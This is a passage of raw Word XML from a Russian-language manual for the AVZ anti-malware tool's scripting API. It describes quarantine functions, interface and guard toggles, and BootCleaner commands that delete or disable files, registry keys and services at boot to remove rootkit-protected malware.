      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сы/DLL/драйверы, элементы автозапуска.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CreateQurantineArchive(AFileName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Функция создает архив с файлами, помещенными сегодня в папку кара</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тина (т.е. берутся все файлы из папки Infected, соответствующей текущей дате). Архив имеет ZIP формат, пароль – virus. Если указанная в параметре AFileName папка не существует, то перед сохранением архива делается попытка создать ее.</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CreateInfectedArchive(AFileName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Функция создает архив с файлами, помещенными сегодня в Infected (т.е. берутся все файлы из папки карантина, соответствующей текущей дате). Архив имеет ZIP формат, пароль – virus. Если указанная в параметре AFileName папка не существует, то перед сохранением </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>архива делается попытка создать ее.</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QuarantineFile(AFileName, AMsg : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>):boolean;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Копирование указанного файла с именем AFileName в карантин. При п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>мещение в карантин в описание файла вносится текст из параметра AMsg. Если файл уже есть в карантине или он опознан по базе безопасных, то копирование в карантин блокируется.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Если файл найден и успешно скопирован в карантин, то функция возвр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">щает true.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QuarantineFileF(ASearchPath:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;AMaskList:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserv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ARecurse : boolean;</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AMsg : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserv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ASizeMin, ASizeMax : integer;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ADateMin : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ''; ADateMax : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = '';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ACopyRigth : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = '';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AMD5 : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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Поиск файлов по заданному набору условий и копирование найденных файлов в карантин.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Является аналогов функции </w:t>
      </w:r>
      <w:hyperlink r:id="rId133" w:history="1">
        <w:r w:rsidRPr="006E1E7E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>QuarantineFile</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> для случая, когда неизвестно точное имя файла, но есть некоторые данные о нем (например, известен размер файла, его дата создания/модификации, копирайты или MD5).</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Если любой из найденных файлов уже есть в карантине, или он опознан по базе безопасных, то копирование в карантин блокируется.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ClearQuarantine:boolean;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w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>очистку</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>карантина</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Чистится только папка карантина за тек</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>щую дату.</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GetAVZDirectory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полный путь (с завершающим '\' на конце) к папке, из кот</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">рой запущен AVZ.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GetScanPath:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>string</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список сканируемых папок. Если задано сканирование н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>скольких папок, то они разделяются точкой с запятой.</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GetAVZVersion : double;</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версию AVZ в виде числа с плавающей запятой. Следует помнить, что условия "=" к переменным с плавающей запятой применять не р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">комендуется.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GetAVZVersionTxt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Получение версии AVZ в текстовом виде. Возвращается строка, вывод</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>мая в копирайты протоколов (она содержит версию и дату ее выпуска).</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GetAVZSvcName(ID : integer)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имя службы AVZ с указанным идентификатором.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lastRenderedPageBreak/>
        <w:t>procedure</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> UnLockInterface;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Разблокирует интерфейс программы AVZ для пользователя. Вызов для незаблокированного состояния интерфейса и повторные вызовы не являются ошибкой</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LockInterface;</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Заблокировать интерфейс программы AVZ для пользователя. Повторные вызовы не являются ошибкой.</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SetStatusBarText(AMsg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Выводит заданный текст в строке статуса. Может применяться для выв</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>да информации о ходе работы скрипта, особенно в случае его длительного в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>полнения.</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SetAVZPMStatus(ANewStatus : boolean)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Включает или выключает AVZPM. ANewStatus – новый статус системы AVZPM. Если ANewStatus = true, то система AVZPM активируется, если false – выключается. Попытка повторного включение или повторного выключения не является ошибкой. Активация предполагает установку драйвера на диск, рег</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>страцию драйвера в реестре и загрузку драйвера. Удаление предполагает уд</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ление ключа реестра и файла драйвера с диска.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Возвращаемое значение: возвращается признак успешности выполнения операции, true – операция выполнена успешно, false – ошибка.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GetAVZPMStatus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текущий статус AVZPM – true=включен, false=выключен.</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SetAVZGuardStatus(ANewStatus : boolean)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Включает или выключает AVZGuard. ANewStatus – новый статус системы AVZGuard. Если ANewStatus = true, то система AVZGuard активируется, если false – выключается. Попытка повторного включение или повторного выключ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ния не является ошибкой.</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Возвращаемое значение: возвращается признак успешности выполнения операции, true – операция выполнена успешно, false – ошибка.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GetAVZGuardStatus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текущий статус AVZGuard – true=включен, false=выключен.</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BC_Activate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активацию системы, установку драйвера и его настройку. Перед вызовом BC_Activate необходимо указать удаляемые объекты при п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>мощи команд BC_DeleteFile, BC_DeleteReg, BC_DeleteSvc. Функция возвращ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ет true в случае успешной установки и конфигурирования драйвера и false в случае ошибки.</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BC_DeActivate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Производит удаление драйвера с диска и всех принадлежащих драйверу ключей и </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>параметров из реестра. Возвращает true в случае успешного удаление драйвера.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BC_Execute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Устанавливает драйвер и настраивает его, после чего производит прин</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дительную загрузку драйвера, что приводит к выполнению поставленного драйверу задания немедленно, без перезагрузки. Может применяться для уд</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ления объектов из режима ядра без перезагрузки, а также для отладочных ц</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>лей. После успешного выполнения операций драйвер самоуничтожается, п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">этому вызов BC_DeActivate необязателен.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BC_Clear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очистку существующих настроек. В момент старта скрипта данная операция выполняется автоматически.</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BC_LogFile(AFileName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Данная функция позволяет включить протоколирование и задать имя и местоположение файла протокола. Задание вместо имени протокола пустой строки отключает протоколирование. По умолчание протоколирование откл</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ю</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>чено. Задание недопустимого имени файла или корректного имени на нед</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ступном в момент загрузки системы диске не является ошибкой – в случае н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>возможности создания файла протоколирование отключится, но драйвер в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>полнить все предписанные в настройках операции.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BC_QrFile(AFileName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Добавляет команду карантина указанного файла в сценарий BootCleaner. В имени файлы допустимы макросы. Карантин файлов посредством BootCleaner полезен в случае, если вредоносная программа блокирует доступ к своим файлам при помощи руткит–механихмов, которые не удается нейтрал</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>зовать встроенным антируткитом AVZ. Помещенные в карантин файлы д</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ступны через строенные средства просмотра карантина AVZ, но файлы имен</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ются как bcqrXXXXX.dat и bcqrXXXXX.ini</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BC_QrSvc(ASvcName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Добавляет команду карантина указанной службы или драйвера. Пом</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>щенные в карантин файлы доступны через строенные средства просмотра к</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>рантина AVZ, но файлы именуются как bcqrXXXXX.dat и bcqrXXXXX.ini</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BC_DeleteFile(AFileName : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) : boolean;</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Добавляет команду удаления файла с именем AFileName в сценарий BootCleaner. В</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>имени</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>файлы</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>допустимы</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>макросы</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BC_CopyFile(AFromName, AToName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Добавляет команду копирования файла AFromName –&gt; AToName в сц</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нарий BootCleaner.</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BC_DeleteReg(AKeyName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lastRenderedPageBreak/>
        <w:t>Добавляет команду удаления ключа реестра с именем AKeyName в сц</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нарий BootCleaner. Имя ключа реестра должно начинаться с имени раздела, д</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>пустимы следующие имена разделов: HKLM, HKCU, HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER.</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BC_DeleteSvcReg(ASvcName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Добавляет команду удаления ключа реестра для драйвера или службы с именем ASvcName в сценарий BootCleaner. Важно отметить, что исполняемый файл на диске при это не удаляется.</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BC_DeleteSvc(ASvcName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Добавляет команду удаления драйвера или службы с именем ASvcName в сценарий BootCleaner. Удаление предполагает поиск и удаление исполняемого файла указанной службы с последующим удалением соответствующего ей ключа реестра.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BC_DisableSvc(ASvcName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Добавляет команду отключения драйвера или службы с именем ASvcName в сценарий BootCleaner. Отключение предполагает установку стат</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>са 4 (отключен) в соответствующем ключе реестра. Остальные параметры в р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>естре и файл на диске при этом не затрагиваются.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BC_ImportDeletedList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импорт списка удаленных файлов в настройки Boot Cleaner. Список удаленных файлов ведется автоматически и пополняется при каждом вызове функции DeleteFile. Кроме того, возможно ручное добавление файлов в список удаленных при помощи SysCleanAddFile. Список удаленных файлов применяется для эвристической чистки системы, которая активируется кома</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дой ExecuteSysClean.</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BC_ImportQuarantineList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импорт списка файлов, для которых делались попытки кара</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тина, в настройки Boot Cleaner. Список файлов ведется автоматически и попо</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>л</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">няется при каждом вызове функции </w:t>
      </w:r>
      <w:hyperlink r:id="rId134" w:history="1">
        <w:r w:rsidRPr="006E1E7E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>QuarantineFile</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Для каждого файла из да</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ного списка будет выполнена операция </w:t>
      </w:r>
      <w:hyperlink r:id="rId135" w:history="1">
        <w:r w:rsidRPr="006E1E7E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>BC_QrFile</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</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BC_ImportALL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Импортирует в настройки Boot Cleaner всю информацию об операциях, выполненных до этого в скрипте при помощи </w:t>
      </w:r>
      <w:hyperlink r:id="rId136" w:history="1">
        <w:r w:rsidRPr="006E1E7E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>DeleteFile</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:hyperlink r:id="rId137" w:history="1">
        <w:r w:rsidRPr="006E1E7E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>QuarantineFile</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
